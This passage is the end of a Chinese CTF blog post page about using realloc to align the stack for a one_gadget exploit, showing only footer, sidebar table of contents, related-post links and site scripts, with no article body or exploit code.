      <div>
        <img data-src="/images/alipay.png" alt="invincible 支付宝">
        <p>支付宝</p>
      </div>
  </div>
</div>

      

<div id="copyright">
<ul>
  <li class="author">
    <strong>本文作者： </strong>invincible <i class="ic i-at"><em>@</em></i>清風微醺
  </li>
  <li class="link">
    <strong>本文链接：</strong>
    <a href="https://www.wdqjxtmph.top/2022/02/02/%E5%88%A9%E7%94%A8realloc%E8%B0%83%E6%95%B4%E6%A0%88%E4%BD%BFone_gadget%E7%94%9F%E6%95%88/" title="利用realloc调整栈使one_gadget生效">https://www.wdqjxtmph.top/2022/02/02/利用realloc调整栈使one_gadget生效/</a>
  </li>
  <li class="license">
    <strong>版权声明： </strong>本站所有文章除特别声明外，均采用 <span class="exturl" data-url="aHR0cHM6Ly9jcmVhdGl2ZWNvbW1vbnMub3JnL2xpY2Vuc2VzL2J5LW5jLXNhLzQuMC9kZWVkLnpo"><i class="ic i-creative-commons"><em>(CC)</em></i>BY-NC-SA</span> 许可协议。转载请注明出处！
  </li>
</ul>
</div>

  </footer>

</article>

  </div>
  

<div class="post-nav">
    <div class="item left">
      

  <a href="/2021/11/29/SCU%E6%96%B0%E7%94%9F%E8%B5%9B2021/" itemprop="url" rel="prev" data-background-image="https:&#x2F;&#x2F;tva2.sinaimg.cn&#x2F;mw690&#x2F;6833939bly1giclflwv2aj20zk0m84qp.jpg" title="SCU新生赛2021 pwn wp">
  <span class="type">上一篇</span>
  <span class="category"><i class="ic i-flag"></i> CTF</span>
  <h3>SCU新生赛2021 pwn wp</h3>
  </a>

    </div>
    <div class="item right">
    </div>
</div>

  
  <div class="wrap" id="comments"></div>


        </div>
        <div id="sidebar">
          

<div class="inner">

  <div class="panels">
    <div class="inner">
      <div class="contents panel pjax" data-title="文章目录">
          <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#%E5%89%8D%E8%A8%80"><span class="toc-number">1.</span> <span class="toc-text"> 前言</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#one_gadget%E6%88%90%E5%8A%9F%E6%9D%A1%E4%BB%B6"><span class="toc-number">2.</span> <span class="toc-text"> one_gadget 成功条件</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#realloc%E5%87%BD%E6%95%B0%E5%88%86%E6%9E%90"><span class="toc-number">3.</span> <span class="toc-text"> realloc 函数分析</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#%E5%88%A9%E7%94%A8%E8%BF%87%E7%A8%8B"><span class="toc-number">4.</span> <span class="toc-text"> 利用过程</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#%E4%BE%8B%E9%A2%98"><span class="toc-number">5.</span> <span class="toc-text"> 例题</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#roarctf_2019_easy_pwn"><span class="toc-number">5.1.</span> <span class="toc-text"> roarctf_2019_easy_pwn</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E7%A8%8B%E5%BA%8F%E5%88%86%E6%9E%90"><span class="toc-number">5.1.1.</span> <span class="toc-text"> 程序分析</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#pwn"><span class="toc-number">5.1.2.</span> <span class="toc-text"> pwn</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%85%B3%E4%BA%8Eoffset%E7%9A%84%E9%80%89%E6%8B%A9"><span class="toc-number">5.1.3.</span> <span class="toc-text"> 关于 offset 的选择</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#exp"><span class="toc-number">5.1.4.</span> <span class="toc-text"> exp</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#vn_pwn_simpleheap"><span class="toc-number">5.2.</span> <span class="toc-text"> vn_pwn_simpleHeap</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#exp-2"><span class="toc-number">5.2.1.</span> <span class="toc-text"> exp</span></a></li></ol></li></ol></li></ol>
      </div>
      <div class="related panel pjax" data-title="系列文章">
        <ul>
          <li><a href="/2021/08/20/string/" rel="bookmark" title="攻防世界string wp 以及个人对格式化字符漏洞偏移量的一些理解">攻防世界string wp 以及个人对格式化字符漏洞偏移量的一些理解</a></li><li><a href="/2021/09/03/babyrop/" rel="bookmark" title="标准32位程序ROP流程和c语言转义字符">标准32位程序ROP流程和c语言转义字符</a></li><li><a href="/2021/09/07/Libcsearcher%E7%8E%AF%E5%A2%83%E9%85%8D%E7%BD%AE/" rel="bookmark" title="LibcSearcher环境配置和ubuntu更新换源问题">LibcSearcher环境配置和ubuntu更新换源问题</a></li><li><a href="/2021/09/09/64%E4%BD%8D%E6%A0%87%E5%87%86ROP%E4%B8%8E%E5%A0%86%E6%A0%88%E5%B9%B3%E8%A1%A1/" rel="bookmark" title="标准64位程序ROP流程和堆栈平衡">标准64位程序ROP流程和堆栈平衡</a></li><li><a href="/2021/09/25/%E7%94%B5%E7%A7%91%E6%96%B0%E7%94%9F%E8%B5%9B/" rel="bookmark" title="电科新生赛">电科新生赛</a></li><li><a href="/2021/11/14/%E6%9E%81%E5%AE%A2%E5%A4%A7%E6%8C%91%E6%88%982020-format_string/" rel="bookmark" title="格式化字符串漏洞进阶">格式化字符串漏洞进阶</a></li><li><a href="/2021/11/15/%E4%B8%80%E9%81%93%E9%99%90%E5%88%B6%E5%BE%88%E5%A4%9A%E7%9A%84fmt%E9%A2%98/" rel="bookmark" title="格式化字符串漏洞进阶">格式化字符串漏洞进阶</a></li><li><a href="/2021/11/29/SCU%E6%96%B0%E7%94%9F%E8%B5%9B2021/" rel="bookmark" title="SCU新生赛2021 pwn wp">SCU新生赛2021 pwn wp</a></li><li class="active"><a href="/2022/02/02/%E5%88%A9%E7%94%A8realloc%E8%B0%83%E6%95%B4%E6%A0%88%E4%BD%BFone_gadget%E7%94%9F%E6%95%88/" rel="bookmark" title="利用realloc调整栈使one_gadget生效">利用realloc调整栈使one_gadget生效</a></li>
        </ul>
      </div>
      <div class="overview panel" data-title="站点概览">
        <div class="author" itemprop="author" itemscope itemtype="http://schema.org/Person">
  <img class="image" itemprop="image" alt="invincible"
      data-src="/images/avatar.jpg">
  <p class="name" itemprop="name">invincible</p>
  <div class="description" itemprop="description">凌恒山其若陋兮、</div>
</div>

<nav class="state">
    <div class="item posts">
      <a href="/archives/">
        <span class="count">12</span>
        <span class="name">文章</span>
      </a>
    </div>
    <div class="item categories">
      <a href="/categories/">
        <span class="count">3</span>
        <span class="name">分类</span>
      </a>
    </div>
    <div class="item tags">
      <a href="/tags/">
        <span class="count">6</span>
        <span class="name">标签</span>
      </a>
    </div>
</nav>

<div class="social">
</div>

<ul class="menu">
  
    
  <li class="item">
    <a href="/" rel="section"><i class="ic i-home"></i>首页</a>
  </li>

    
  <li class="item">
    <a href="/about/" rel="section"><i class="ic i-user"></i>关于</a>
  </li>

        
  <li class="item dropdown">
      <a href="/default/" rel="section"><i class="ic i-feather"></i>文章</a>
    <ul class="submenu">

        
  <li class="item">
    <a href="/archives/" rel="section"><i class="ic i-list-alt"></i>归档</a>
  </li>

        
  <li class="item">
    <a href="/categories/" rel="section"><i class="ic i-th"></i>分类</a>
  </li>

        
  <li class="item">
    <a href="/tags/" rel="section"><i class="ic i-tags"></i>标签</a>
  </li>

  </ul>

</ul>

      </div>
    </div>
  </div>

  <ul id="quick">
    <li class="prev pjax">
    </li>
    <li class="up"><i class="ic i-arrow-up"></i></li>
    <li class="down"><i class="ic i-arrow-down"></i></li>
    <li class="next pjax">
    </li>
    <li class="percent"></li>
  </ul>
</div>


        </div>
        <div class="dimmer"></div>
      </div>
    </main>
    <footer id="footer">
      <div class="inner">
        <div class="widgets">
          
<div class="rpost pjax">
  <h2>随机文章</h2>
  <ul>
      
  <li class="item">
    
<div class="breadcrumb">
<a href="/categories/%E5%AD%A6%E4%B9%A0%E7%AC%94%E8%AE%B0/" title="分类于 学习笔记">学习笔记</a>
</div>

    <span><a href="/2021/10/30/%E5%A0%86%E5%AD%A6%E4%B9%A0%E7%AC%94%E8%AE%B0-UAF/" title="堆学习-UAF">堆学习-UAF</a></span>
  </li>

      
  <li class="item">
    
<div class="breadcrumb">
<a href="/categories/%E7%89%88%E6%9D%83%E5%A3%B0%E6%98%8E/" title="分类于 版权声明">版权声明</a>
</div>

    <span><a href="/2021/08/20/%E5%A3%B0%E6%98%8E/" title="版权声明">版权声明</a></span>
  </li>

      
  <li class="item">
    
<div class="breadcrumb">
<a href="/categories/CTF/" title="分类于 CTF">CTF</a>
</div>

    <span><a href="/2021/09/03/babyrop/" title="标准32位程序ROP流程和c语言转义字符">标准32位程序ROP流程和c语言转义字符</a></span>
  </li>

      
  <li class="item">
    
<div class="breadcrumb">
<a href="/categories/CTF/" title="分类于 CTF">CTF</a>
</div>

    <span><a href="/2021/09/25/%E7%94%B5%E7%A7%91%E6%96%B0%E7%94%9F%E8%B5%9B/" title="电科新生赛">电科新生赛</a></span>
  </li>

      
  <li class="item">
    
<div class="breadcrumb">
<a href="/categories/CTF/" title="分类于 CTF">CTF</a>
</div>

    <span><a href="/2021/11/15/%E4%B8%80%E9%81%93%E9%99%90%E5%88%B6%E5%BE%88%E5%A4%9A%E7%9A%84fmt%E9%A2%98/" title="格式化字符串漏洞进阶">格式化字符串漏洞进阶</a></span>
  </li>

      
  <li class="item">
    
<div class="breadcrumb">
<a href="/categories/CTF/" title="分类于 CTF">CTF</a>
</div>

    <span><a href="/2021/11/29/SCU%E6%96%B0%E7%94%9F%E8%B5%9B2021/" title="SCU新生赛2021 pwn wp">SCU新生赛2021 pwn wp</a></span>
  </li>

      
  <li class="item">
    
<div class="breadcrumb">
<a href="/categories/CTF/" title="分类于 CTF">CTF</a>
</div>

    <span><a href="/2021/09/07/Libcsearcher%E7%8E%AF%E5%A2%83%E9%85%8D%E7%BD%AE/" title="LibcSearcher环境配置和ubuntu更新换源问题">LibcSearcher环境配置和ubuntu更新换源问题</a></span>
  </li>

      
  <li class="item">
    
<div class="breadcrumb">
<a href="/categories/CTF/" title="分类于 CTF">CTF</a>
</div>

    <span><a href="/2021/11/14/%E6%9E%81%E5%AE%A2%E5%A4%A7%E6%8C%91%E6%88%982020-format_string/" title="格式化字符串漏洞进阶">格式化字符串漏洞进阶</a></span>
  </li>

      
  <li class="item">
    
<div class="breadcrumb">
<a href="/categories/%E5%AD%A6%E4%B9%A0%E7%AC%94%E8%AE%B0/" title="分类于 学习笔记">学习笔记</a>
</div>

    <span><a href="/2021/10/24/%E5%A0%86%E5%AD%A6%E4%B9%A0%E7%AC%94%E8%AE%B0-chunk%20overlapping/" title="堆学习-Chunk Overlapping">堆学习-Chunk Overlapping</a></span>
  </li>

      
  <li class="item">
    
<div class="breadcrumb">
<a href="/categories/CTF/" title="分类于 CTF">CTF</a>
</div>

    <span><a href="/2022/02/02/%E5%88%A9%E7%94%A8realloc%E8%B0%83%E6%95%B4%E6%A0%88%E4%BD%BFone_gadget%E7%94%9F%E6%95%88/" title="利用realloc调整栈使one_gadget生效">利用realloc调整栈使one_gadget生效</a></span>
  </li>

  </ul>
</div>
<div>
  <h2>最新评论</h2>
  <ul class="leancloud-recent-comment"></ul>
</div>

        </div>
        <div class="status">
  <div class="copyright">
    
    &copy; 2010 – 
    <span itemprop="copyrightYear">2022</span>
    <span class="with-love">
      <i class="ic i-sakura rotate"></i>
    </span>
    <span class="author" itemprop="copyrightHolder">invincible @ Nirvana</span>
  </div>
  <div class="powered-by">
    基于 <span class="exturl" data-url="aHR0cHM6Ly9oZXhvLmlv">Hexo</span> & Theme.<span class="exturl" data-url="aHR0cHM6Ly9naXRodWIuY29tL2FtZWhpbWUvaGV4by10aGVtZS1zaG9rYQ==">Shoka</span>
  </div>
</div>

      </div>
    </footer>
  </div>
<script data-config type="text/javascript">
  var LOCAL = {
    path: '2022/02/02/利用realloc调整栈使one_gadget生效/',
    favicon: {
      show: "（●´3｀●）やれやれだぜ",
      hide: "(´Д｀)大変だ！"
    },
    search : {
      placeholder: "文章搜索",
      empty: "关于 「 ${query} 」，什么也没搜到",
      stats: "${time} ms 内找到 ${hits} 条结果"
    },
    valine: true,fancybox: true,copyright: '复制成功，转载请遵守 <i class="ic i-creative-commons"></i>BY-NC-SA 协议。',
    ignores : [
      function(uri) {
        return uri.includes('#');
      },
      function(uri) {
        return new RegExp(LOCAL.path+"$").test(uri);
      }
    ]
  };
</script>

<script src="https://cdn.polyfill.io/v2/polyfill.js"></script>

<script src="//cdn.jsdelivr.net/combine/npm/pace-js@1.0.2/pace.min.js,npm/pjax@0.2.8/pjax.min.js,npm/whatwg-fetch@3.4.0/dist/fetch.umd.min.js,npm/animejs@3.2.0/lib/anime.min.js,npm/algoliasearch@4/dist/algoliasearch-lite.umd.js,npm/instantsearch.js@4/dist/instantsearch.production.min.js,npm/lozad@1/dist/lozad.min.js,npm/quicklink@2/dist/quicklink.umd.js"></script>

<script src="/js/app.js?v=0.2.5"></script>




</body>
</html>
